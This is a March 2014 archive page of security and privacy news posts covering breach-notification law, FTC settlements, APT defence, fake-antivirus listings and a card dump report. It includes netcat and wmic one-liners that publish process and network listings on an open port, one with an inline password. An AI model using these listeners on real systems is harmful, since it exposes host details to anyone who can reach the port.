Monthly Archives: March 2014

Leak of Grid Vulnerabilities Creates National Security Risks

The recent leak of an internal memo to the former Chair of the Federal Energy Regulatory Commission, which was widely reported by national news media, has created a national security setback for the United States. Many are concerned that the disclosure may provide terrorists and other bad actors a roadmap for causing a prolonged nationwide blackout. Perhaps more importantly, the leak undermines the relationship of trust between industry and government agencies that the parties have been working for years to establish; a relationship that is vital to developing a stronger security posture for the electrical grid and in other critical infrastructure sectors. In an article published in Intelligent Utility Update, Hunton & Williams partner Paul M. Tiao discusses the effects of the leak on national security and on the relationship between the energy industry and the government.

Episode #176: Step Up to the WMIC

Tim grabs the mic:

Michael Behan writes in:

Perhaps you guys can make this one better. Haven’t put a ton of thought into it:

C:\> (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

Then visit http://127.0.0.1:3000

This could of course be used to generate a lot more HTML reports via wmic that are quick to save from the browser. The downside is that in its current state the page can only be visited once. Adding something like /every:5 just pollutes the web page with mostly duplicate output.

Assuming you already have netcat (nc.exe) on the system the command above will work fine, but it will only work once. After the browser receives the data the connection has been used and the command is done. To do this multiple times you must wrap it in an infinite For loop.

C:\> for /L %i in (1, 0, 2) do (echo HTTP/1.0 200 OK & wmic process list full /format:htable) | nc -l -p 3000

This will count from 1 to 2 and count by 0, which will never happen (except for very large values of 0). We could use the wmic command to request this information from the remote machine and view it in our browser. This method will authenticate to the remote machine instead of allowing anyone to access the information.

C:\> wmic /node:joelaptop process list full /format:htable > joelaptopprocesses.html && start joelaptopprocesses.html

This will use your current credentials to authenticate to the remote machine, request the remote process list in HTML format, save it to a file, and finally open the file in your default viewer (likely your browser). If you need to use separate credentials you can specify /user:myusername and /password:myP@assw0rd.

Hal, your turn, and I want to see this in nice HTML format. :)

Hal throws up some jazz hands:

Wow. Tim seems a little grumpy. Maybe it's because he can make a simple web server on the command line but has no way to actually request data from it via the command line. Don't worry Little Tim, maybe someday...

Heck, maybe Tim's grumpy because of the dumb way he has to code infinite loops in CMD.EXE. This is a lot easier:

$ while :; do ps -ef | nc -l 3000; done

Frankly, most browsers will interpret this as "text/plain" by default and display the output correctly.

But the above loop got me thinking that we could actually stack multiple commands in sequence:

while :; do
ps -ef | nc -l 3000
netstat -anp | nc -l 3000
df -h | nc -l 3000
...
done

Each connection will return the output of a different command until you eventually exhaust the list and start all over again with the first command.

OK, now let's deal with grumpy Tim's request for "nice HTML format". Nothing could be easier, my friends:

$ while :; do (echo '<pre>'; ps -ef; echo '</pre>') | nc -l 3000; done

Hey, it's accepted by every major browser I tested it with! And that's the way we do it downtown... (Hal drops the mic)
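The same idea with the headers and the escaping filled in, as an added example (not Tim's or Hal's code, and not part of the episode): a complete HTTP/1.0 response with Content-Type and Content-Length, and the command output HTML-escaped before it goes inside <pre>, since a process whose command line contains markup would otherwise be rendered rather than displayed by the browser viewing the report. Function names are mine; it assumes a netcat that accepts "nc -l PORT".

```shell
#!/bin/sh
# html_escape: neutralise the three characters that would otherwise be parsed
# as markup once the output is wrapped in <pre>. Without this, a process whose
# command line contains "<script>" is rendered, not displayed, by the browser.
html_escape() {
    sed -e 's/&/\&amp;/g' -e 's/</\&lt;/g' -e 's/>/\&gt;/g'
}

# http_response CONTENT_TYPE  (body on stdin, full HTTP/1.0 response on stdout)
# Adds Content-Type, so the browser does not have to guess "text/plain", and
# Content-Length plus Connection: close, so it knows where the body ends.
http_response() {
    ctype="$1"
    body=$(cat; printf x)      # the trailing x keeps the body's final newlines
    body=${body%x}
    len=$(printf '%s' "$body" | wc -c | tr -d ' ')
    printf 'HTTP/1.0 200 OK\r\n'
    printf 'Content-Type: %s; charset=utf-8\r\n' "$ctype"
    printf 'Content-Length: %s\r\n' "$len"
    printf 'Connection: close\r\n\r\n'
    printf '%s' "$body"
}

# html_report: Hal's <pre> trick with the command output escaped first.
html_report() {
    { printf '<pre>\n'; html_escape; printf '</pre>\n'; } | http_response 'text/html'
}

# serve_loop PORT CMD...: one command's report per connection, cycling through
# the list forever, like the while loop in the episode. Assumes a netcat that
# takes "nc -l PORT" (use "nc -l -p PORT" for the traditional variant).
serve_loop() {
    port="$1"; shift
    while :; do
        for cmd in "$@"; do
            sh -c "$cmd" 2>&1 | html_report | nc -l "$port"
        done
    done
}

# Example invocation (blocks until killed):
#   serve_loop 3000 'ps -ef' 'netstat -an' 'df -h'
```

Like the one-liners in the episode, this answers anyone who can reach the port; only Tim's wmic /node: variant authenticates the requester, so treat whatever it serves as readable by everyone on that network.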

Article 29 Working Party Issues Opinion on Personal Data Breach Notification

On March 25, 2014, the Article 29 Working Party adopted Opinion 03/2014 (the “Opinion”) providing guidance on whether individuals should be notified in case of a data breach.

The Opinion goes beyond considering the notification obligations contained in the e-Privacy Directive 2002/58/EC, which requires telecommunications service providers to notify the competent national authority of all data breaches. The Directive also requires notification (without undue delay) to the affected individuals when the data breach is likely to adversely affect the personal data or privacy of individuals, unless the service provider has satisfactorily demonstrated that it has implemented appropriate technological safeguards that render the relevant data unintelligible to unauthorized parties and that these measures were applied to the data concerned by the security breach.

Adding to the general notification obligation under the proposed EU General Data Protection Regulation (the “Proposed Regulation”), the Opinion provides a non-exhaustive list of examples of data breaches from multiple sectors, where individuals should be notified. In each case, the Opinion also gives examples of technical measures that could have prevented a notification obligation had they been in place prior to the data breach.

The Opinion lists examples of cases where notification to the affected individuals would not be required, such as a confidentiality data breach that only concerns either encrypted data with a state of the art algorithm or salted/keyed, hashed data with a state of the art hash function (assuming all the relevant keys and salts are not compromised). The Opinion also discusses various considerations companies face when assessing whether or not to notify affected individuals, emphasizing the need to factor in likely secondary adverse effects on the individuals and indicating that companies should notify even if only one individual is affected.

According to the Opinion, providing notification in the example cases constitutes a good practice pending the adoption of the Proposed Regulation. The European Parliament recently formally adopted the compromise text of the Proposed Regulation. The next steps for the Proposed Regulation are for the EU Council of Ministers to formulate a position and for trilateral negotiations between the European Commission, Parliament and Council to begin.

FTC Settles with Fandango and Credit Karma over Mobile App Security Failures

On March 28, 2014, the Federal Trade Commission announced proposed settlements with Fandango and Credit Karma stemming from allegations that the companies misrepresented the security of their mobile apps and failed to secure consumers’ sensitive personal information transmitted using their mobile apps.

The FTC alleged that Fandango and Credit Karma did not take reasonable steps to secure their mobile apps, including by overriding the industry standard Secure Sockets Layer (“SSL”) certificate validation process. According to the FTC, by disabling the SSL process, the companies undermined the security of the apps’ communications; any information the apps sent or received could be intercepted by hackers. This type of vulnerability is especially problematic with respect to sensitive transactions on public Wi-Fi networks.

The settlements require Fandango and Credit Karma to establish comprehensive security programs and undergo independent biennial security assessments for 20 years. The companies also are barred from misrepresenting the privacy or security of their products and services.

Read the FTC’s Business Center Blog post regarding the settlements.

Update: On August 19, 2014, the FTC approved the final settlement orders with Fandango and Credit Karma.

Australian Data Breach Notification Bill Re-Introduced

On March 20, 2014, Australia’s Privacy Amendment (Privacy Alerts) Bill 2014 was re-introduced in the Senate for a first read. The bill, which was subject to a second reading debate on March 27, 2014, originally was introduced on May 29, 2013, but it lapsed on November 12, 2013 at the end of the session.

As we previously reported, if passed, the bill would amend the Privacy Act 1988 by introducing a mandatory breach notification requirement for “serious data breaches.” The proposed definition of “serious data breach” includes a harm threshold: pursuant to the bill, the breach notification obligation would be triggered if unauthorized access to, or disclosure of, personal information would result in a “real risk of serious harm” to the individual to whom the information relates. In the event an organization “believes on reasonable grounds” that there has been a “serious data breach,” the organization would be required, as soon as practicable, to notify affected individuals and submit a copy of the notification to the Australian Privacy Commissioner. The bill also contemplates notification methods, and would allow the Privacy Commissioner to exempt organizations from the notification requirement under certain circumstances.

CIO vs CSO: Allies or Enemies


Whenever a breach occurs it reveals weaknesses in how an organization approached security. Compromises are a great way to reveal the hidden sins organizations are committing. In the case of the Target breach, it is a gift that keeps on giving. While the initial breach report came out in December, it seems every week there are new “interesting” details that are revealed. One of the more recent items is the fact that Target did not have a CSO and all security responsibilities were buried under the CIO.

The first question that people ask is whether the CIO should have been held responsible for the breach. The bottom line is that when a major event like this occurs, someone needs to be held responsible for the negligence. Therefore it is not surprising that someone was blamed for the breach. What was surprising is that security was a responsibility of the CIO. The fact that a large organization did not have a separate CSO who is a peer of the CIO is what is most concerning about the story. Clearly many things went wrong during the breach, and whoever had responsibility for security needs to be held accountable. However, it was not fair that the executives structured the company in this manner. Running the IT infrastructure (typically a role of the CIO) and protecting the information (typically a role of the CSO) are two different roles, and it is unfair to expect one person to do both effectively. While these roles can at times be complementary, they are often at odds. Having security buried under the CIO puts that person in a conflict-of-interest situation.

First and foremost, organizations of any size, especially one the size of Target, need to have an executive who is responsible for security. With the heavy dependence organizations have on digital infrastructure, security needs to have a seat at the table in the boardroom. If security gets buried under IT, whose primary responsibility is running a reliable infrastructure, bad decisions will be made and breaches will happen.

Not having a CSO today is like a football team not having a quarterback. You can have the best playbook in the world, but if you do not have someone on the field calling the plays, you are not going to win many games. In order for organizations to be successful, they must have a reliable infrastructure and proper protection of information. If an organization only has a CIO and no CSO, no one is focusing on security and the results are pretty obvious. If there is no one focusing on security, bad things will happen. Lack of a CSO means lack of security. It is almost a guarantee that Target had an amazing security team who were screaming and yelling about all of the security issues, but there was no advocate who was listening to them and fighting their cause with the executives. From the engineers, there needs to be a communication path to the CEO, and the CSO is that channel. Without a CSO, the proper security communication does not make it to the executives. Therefore, if the executives had received the proper information about security, my guess is they would have made different decisions and this story would potentially have had a happy ending.

The CIO and CSO need to be peers. IT and security need to have equal representation in the boardroom, making sure the executives have accurate information. Typically the CIO will report to the COO and the CSO will report to the CFO. The COO and CFO report directly to the executive. However an organization decides to structure it, the CIO and CSO must have different reporting structures.

In order for the CIO and CSO to have an effective working relationship, they must have clear boundaries of responsibility. Typically what works best is for the CSO to define the proper level of security, the CIO to implement the security, and the auditor to validate that the security is being done correctly. The security defined by the CSO should be based on metrics that are reported to the executives, so they can understand the proper level of risk to accept for the organization. Metrics-based security is key to success. With metrics there are clear guidelines of what must be done and an easy way to measure compliance.

Organizations in this day and age must have a CSO. Every day that passes, with more breaches becoming public, it becomes easier to convince the executives that they need a CSO. The problem is that many CIOs do not want to have a CSO, because it is easier for them to accomplish their jobs if they control all aspects of the IT infrastructure. Therefore the CIO will not usually lobby for a CSO. There needs to be another advocate convincing the CEO. The simple question to sell the CEO is “are you comfortable with the level of security at your organization, and are you receiving the proper security metrics to make the decisions?” The problem today is that many CEOs want to create a CSO position, but the CIO convinces them they do not need one. While they have good intentions, it is often the CIO who lobbies against a CSO, since a CSO will cause them to give up control and potentially make their job more difficult. For example, when a CSO comes in they often disclose all of the security problems, which shows that security was not being properly addressed within the organization.

Defending Against the APT


Advanced Persistent Threat (APT)

Introduction
APT, formally known as the Advanced Persistent Threat, is the buzzword that everyone is using. Companies are concerned about it, the government is being compromised by it and consultants are using it in every presentation they give. One of the main reasons organizations are broken into today is that they are fixing the wrong vulnerabilities. If you fix the threats of 3 years ago, you will lose. APT allows organizations to focus on the real threats that exist today.

While APT is important, we need to clear the smoke and hype, focusing on why it is important and what it means to you.  Instead of just using it as a buzz word, if we understand the core components of APT, we can use it to improve our security.  In APT, threat drives the risk calculation.  Only by understanding the offensive threat will an organization be able to fix the appropriate vulnerabilities. 

What is APT?
APT is the new way attackers are breaking into systems. APT is a sophisticated, mercurial way for advanced attackers to break into systems, avoid getting caught, and keep long-term access so they can exfiltrate data at will. The following are the important things to remember:

1) APT focuses on any organization, both government and non-government. Some people make the mistake of thinking that the APT is only focused on Department of Defense (DoD) sites. When it comes to the Internet, the lines between government and commercial are blurring, and anything that could cause harm to a country will be targeted.

2) While the threat is advanced once it gets into a network, the entry point for many attacks is convincing a user to click on a link. However, once the APT breaks into a system, it is very sophisticated in what it does and how it works. Signature analysis will be ineffective in protecting against it. Advanced attacks are always changing, recompiling on the fly and utilizing encryption to avoid detection.

3) Many organizations make the mistake of thinking of attacks like the weather. There will be some stormy days and there will be some sunny days. However, on the Internet you are always in a storm. In the past, attackers would periodically attack an organization. Today attacks are nonstop. The attackers are persistent, and if an organization lets its guard down for any period of time, the chance of a compromise is very high.

4) Attackers want to take advantage of economies of scale and break into as many sites as possible as quickly as possible. Therefore the attacker's tool of choice is automation. Automation is not only what causes the persistent nature of the threat, but it is also what allows attackers to break into sites very quickly.

5) Old school attacks were about giving the victim some visible indication of a compromise. Today it is all about not getting caught. Stealth and being covert are the main goals of today’s attacks. The APT’s goal is to look as close as possible (if not identical) to legitimate traffic. The difference is so minor that many security devices cannot differentiate between them.

6) The driver of APT is to provide some significant benefit to the attacker, the benefit being either economic or financial gain. Therefore the focus will be all about the data. Anything that has value to an organization will have value to an attacker. Since data has become so portable, and with cloud computing increasing in popularity, data is now available from the Internet via many sources.

7) Attackers do not just want to get in and leave; they want long-term access. If someone is going to spend effort breaking into a site, they will make sure they can keep that access for a long period of time. Stealing data once has value, but stealing data for 9 months gives the attacker even more payoff.

Putting all of this together means that you will be constantly attacked and compromised, making it necessary for an organization to always be in battle mode. This is a never-ending battle. Since the APT is meant to be extremely stealthy, there is a good chance that an organization might be compromised and not know about it for several months. Before you discount this, ask yourself: if you were compromised and the attacker was not doing any visible damage, how would you know?

How to Defend Against the APT?
Prevention is ideal, but detection is a must.  Most organizations focus solely on preventive measures but the problem with the APT is that it enters a network and looks just like legitimate traffic and users.  Therefore, there is little to prevent.  Only after the packets are in the network do they start doing harm and breaking in.

Based on the new threat vectors of the APT, the following are key things organizations can do to protect against the threat:

1) Control the user and raise awareness – the general rule is you cannot stop stupid, but you can control stupid. Many threats enter a network by tricking the user into clicking a link that they shouldn’t. Limiting the actions a user is allowed to take, combined with proper awareness sessions, can go a long way toward reducing the overall exposure.

2) Perform reputation ranking on behavior – traditional security tries to classify something as either good or bad, allow or block. However, with advanced attacks this classification does not scale. Many attackers start off looking like legitimate traffic, which means they would be allowed into the network, and then once they are in they turn bad. Therefore, since the goal of attackers is to blend in, you need to track the behavior over time and rank the confidence level of whether it looks more like a legitimate user or more like evil.

3) Focus on outbound traffic – inbound traffic is often what is used to prevent and stop attackers from entering a network. While that will catch some attacks and is still important to do, with the APT it is the outbound traffic that is more damaging. If the intent is to stop exfiltration of data and information, looking at the outbound traffic is how you detect the anomalous behavior that is tied to damage to an organization.

4) Understand the changing threat – it is hard to defend against something you do not know about. Therefore, the only way to be good at defense is to understand and know how the offense operates. If organizations do not keep up with the new techniques and tactics of the attackers, they will not be able to tune their defensive measures to work correctly.

5) Manage the endpoint – while attackers might break into a network as the entry point, they ultimately want to steal information that exists on endpoints. If you want to limit the damage, controlling and locking down the endpoint will go a long way toward protecting an organization.

While the current threat is advanced, persistent, stealthy, and data focused, organizations can implement effective measures to protect their sites.

Summary
APT is only going to increase in intensity over the next year, not go away. Ignoring this problem just means there will be harm caused to your organization. The key theme of dealing with APT is “Know thy system/network.” The more an organization understands about its network traffic and services, the better it can spot anomalies through clipping levels, which is the better way to defend against the APT. The ultimate way to make sure an organization is properly protected is to run simulated attacks (i.e. penetration testing, red teaming, ethical hacking) to see how vulnerable the organization is and, most importantly, how quickly you detect it. The key to making this successful is to 1) always get explicit approval, 2) run benign attacks, 3) make sure the people running the test are of equal expertise to the true attacker, and 4) fix any vulnerabilities in a timely manner. The good news is that by focusing on understanding the threats and an organization’s vulnerabilities, you can properly defend against the APT.
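The behavioral ranking in item 2, the outbound-traffic focus in item 3 and the clipping levels mentioned in the summary, worked through as an added example that is not from the article: each host's clipping level is derived from a week of constructed daily outbound totals, and on the evaluation day a host's observations add to or subtract from a running reputation score instead of being judged once as allow or block. The flow records, score weights and escalation threshold are illustrative assumptions.

```python
"""Clipping levels on outbound traffic plus behavioral reputation scoring.

Constructed example: a week of daily outbound flow totals per internal host
forms each host's baseline; on the evaluation day one host sends ~50x its
normal volume to a destination it has never talked to before.
"""
from collections import defaultdict
from dataclasses import dataclass
from statistics import mean, pstdev


@dataclass(frozen=True)
class Flow:
    day: int        # day index within the observation window
    src: str        # internal host that initiated the connection
    dst: str        # external destination address
    bytes_out: int  # bytes sent from src to dst


# Constructed sample flows (not real data; addresses from documentation ranges).
SAMPLE_FLOWS = [
    *[Flow(d, "ws-12", "203.0.113.10", 1_200_000 + 50_000 * (d % 3)) for d in range(7)],
    *[Flow(d, "ws-31", "203.0.113.11", 900_000 + 40_000 * (d % 4)) for d in range(7)],
    Flow(7, "ws-12", "198.51.100.77", 60_000_000),  # new destination, huge volume
    Flow(7, "ws-31", "203.0.113.11", 950_000),      # business as usual
]


def daily_outbound(flows):
    """Total outbound bytes per (host, day)."""
    totals = defaultdict(int)
    for f in flows:
        totals[(f.src, f.day)] += f.bytes_out
    return totals


def clipping_levels(flows, baseline_days, k=3.0, floor_ratio=3.0):
    """Per-host clipping level: baseline mean + k * stddev of daily outbound
    bytes, but never below floor_ratio * mean, so a very stable baseline does
    not yield a level that ordinary fluctuation would cross."""
    per_host = defaultdict(list)
    for (host, day), total in daily_outbound(flows).items():
        if day in baseline_days:
            per_host[host].append(total)
    levels = {}
    for host, totals in per_host.items():
        m = mean(totals)
        levels[host] = max(m + k * pstdev(totals), floor_ratio * m)
    return levels


def outbound_anomalies(flows, baseline_days, eval_day, **kw):
    """Hosts whose outbound volume on eval_day exceeds their clipping level,
    mapped to (observed_bytes, clipping_level)."""
    levels = clipping_levels(flows, baseline_days, **kw)
    hits = {}
    for (host, day), total in daily_outbound(flows).items():
        if day == eval_day and host in levels and total > levels[host]:
            hits[host] = (total, levels[host])
    return hits


# Illustrative weights (assumptions): each observation nudges a host's score
# instead of deciding allow/block once; crossing ESCALATE_AT means "investigate".
SCORE_WEIGHTS = {
    "known_destination": -1,   # talking to a host seen during the baseline
    "new_destination": 2,      # first contact with an external host
    "volume_over_clip": 5,     # outbound volume above the clipping level
}
ESCALATE_AT = 5


def reputation_scores(flows, baseline_days, eval_day):
    """Running reputation score per host for eval_day."""
    known = defaultdict(set)
    for f in flows:
        if f.day in baseline_days:
            known[f.src].add(f.dst)
    scores = defaultdict(int)
    for f in flows:
        if f.day == eval_day:
            key = "known_destination" if f.dst in known[f.src] else "new_destination"
            scores[f.src] += SCORE_WEIGHTS[key]
    for host in outbound_anomalies(flows, baseline_days, eval_day):
        scores[host] += SCORE_WEIGHTS["volume_over_clip"]
    return dict(scores)


def hosts_to_investigate(flows, baseline_days, eval_day):
    """Hosts whose score has crossed the escalation threshold, sorted by name."""
    scores = reputation_scores(flows, baseline_days, eval_day)
    return sorted(h for h, s in scores.items() if s >= ESCALATE_AT)


if __name__ == "__main__":
    week = range(7)
    for host, (seen, level) in outbound_anomalies(SAMPLE_FLOWS, week, 7).items():
        print(f"{host}: {seen:,} bytes out, clipping level {level:,.0f}")
    print("investigate:", hosts_to_investigate(SAMPLE_FLOWS, week, 7))
```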

Windows AntiBreach Patrol

Windows AntiBreach Patrol is a fake antivirus. This rogue displays fake alerts to scare users. It replaces Windows Antivirus Patrol, Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master.

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

Windows Antivirus Patrol

Windows Antivirus Patrol is a fake antivirus. This rogue displays fake alerts to scare users. It replaces Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master.

To register (and help removal), copy and paste this code: 0W000-000B0-00T00-E0021

Potential 7 Million Credit Card Details Leaked

UPDATE: Based on further analysis along with discussions with journalists, it appears that this credit card dump contains valid, but older card data that had been previously disclosed. To date, there is no solid evidence this represents a new breach.

The last couple of weeks have seen tensions rising between Russia and Ukraine, and along with it an increase in computer crime.

Sometime earlier this morning, a post allegedly by Anonymous Ukraine claimed to have published “more than 800 million credit cards” by releasing four archives: Visa, Mastercard, American Express, and Discover cards. Based on the initial analysis by Risk Based Security, the number appears to come to a total of 955,579 cards.

While such an attack does not appear to be directly related to the political strife between Ukraine and Russia, it does raise significant issues for card processors and consumers if the leak is legitimate.

Anonymous Ukraine has posted a short message to Pastebin that includes the following:

Today we publish the first part of our exposure of the international financial system Visa, MC, Discover & Amex, enslaved people around the world. More than 800 million credit cards. Over a trillion dollars.

Each of the four archives appears to have valid card numbers, bank routing numbers, and full names. The dump does not contain the CVV (Card Verification Value) or card expiry information. Without this information, committing fraud with the leaked data may be more difficult.

At this time, there is no indication where the data comes from, or whether it is from a single source or from multiple sources. Risk Based Security and the DatalossDB project will continue to examine the data and investigate in hopes of determining more information about the breach.

Update 7:40 PM EST – In addition to the 1 million cards disclosed earlier, Anonymous Ukraine has followed up with an additional leak of over 6 million more cards, announced in a Tweet. Initial analysis of the new dump by RBS shows 6,064,823 new cards. That breaks down to 668,279 American Express, 3,255,663 Visa, 1,778,749 Mastercard, and 362,132 Discover. Counting the disclosure earlier today and the subsequent dump, the grand total now sits at 7,020,402. Upon cursory examination, a majority of the cards appear to come from United States banks. Among the information released, approximately 4,000 records come with full user data including social security number, credit card number, card expiry, name, PINs, floats, dates of birth, states, and zip codes. The new Pastebin dump from the group also suggests the data may come from ATMs or POS systems.

Interview with Gary McGraw – Episode 366 – March 20, 2014

Gary McGraw is the author of many books and over 100 peer-reviewed publications on IT security. In addition, Gary McGraw serves on the Dean’s Advisory Council for the School of Informatics of Indiana University, and produces the monthly Silver Bullet Security Podcast for IEEE Security & Privacy magazine (syndicated by informIT). Gary is the Chief Technical Officer at Cigital Inc. In addition, he serves on the advisory boards of several companies, including Dasient, Fortify Software, Invincea, and Raven White. He holds a dual PhD in Cognitive Science and Computer Science from Indiana University. In the past, Gary McGraw has served on the IEEE Computer Society Board of Governors.

Live from SANS ICS – Episode 365 – March 16, 2014

Justin Searle is a Managing Partner of UtiliSec, specializing in Smart Grid security architecture design and penetration testing. Justin led the Smart Grid Security Architecture group in the creation of NIST Interagency.

Michael Assante is an internationally recognized thought leader in cyber security of industrial control systems. Assante held the position of Vice President and Chief Security Officer at the North American Electric Reliability Corporation and oversaw the implementation of cyber security standards across the North American electric power industry.

Matthew E. Luallen is a well-respected information professional, researcher, instructor, and author. Mr. Luallen serves as the president and co-founder of CYBATI, a strategic and practical educational and consulting company. CYBATI provides critical infrastructure and control system cybersecurity consulting, education, and awareness.

Jonathan Pollet, Founder and Principal Consultant for Red Tiger Security, USA, has over 12 years of experience in both Industrial Process Control Systems and Network Security.

Cyber Insurance: Not Just for Data Protection

President Obama’s Executive Order 13636 on Improving Critical Infrastructure Cybersecurity identified “insurance liability considerations” as an incentive that might improve security. Over the course of the year since the Executive Order was issued, there has been an increase in the marketing of cyber insurance products. In an article published in Law360, Hunton & Williams Insurance Litigation & Counseling partner Lon Berk discusses how most cyber insurance policies currently available do not protect against major risks to critical infrastructure. Since the Executive Order, insurers have taken steps to restrict coverage, resulting in a reduction in the protection of critical infrastructure against cyber attacks.

2014 Privacy, Policy and Technology Summit

Join us in New York City on May 19-20, 2014, for the Privacy, Policy & Technology Summit – A High Level Briefing for Today’s Top Privacy Executives. Lisa Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP will be a featured speaker at the session on “Cybersecurity: Insider Tips for Proactively Protecting Your Company and Its Data While Reducing Downstream Regulatory and Litigation Exposure.”

Other sessions will cover timely topics such as social media, Big Data, managing vendors and third party relationships, risk management and protecting data during transactions.


Hunton Global Privacy Update – March 2014

